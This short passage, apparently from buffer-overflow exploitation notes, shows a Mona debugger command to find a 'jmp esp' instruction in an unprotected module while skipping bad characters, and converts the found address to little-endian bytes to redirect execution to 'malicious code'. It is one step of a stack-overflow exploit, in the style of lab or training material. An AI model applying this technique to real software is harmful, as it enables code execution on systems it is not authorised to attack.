Finding a jump point
Find a jump point with Mona to point to our malicious code
!mona find -s 'jmp esp' -type instr -cm aslr=false,rebase=false,nx=false -cpb "\x00\x08\x2c\xad"Reverse jump address for little endian notation
0x625011af -> "\xaf\x11\x50\x62"Last updated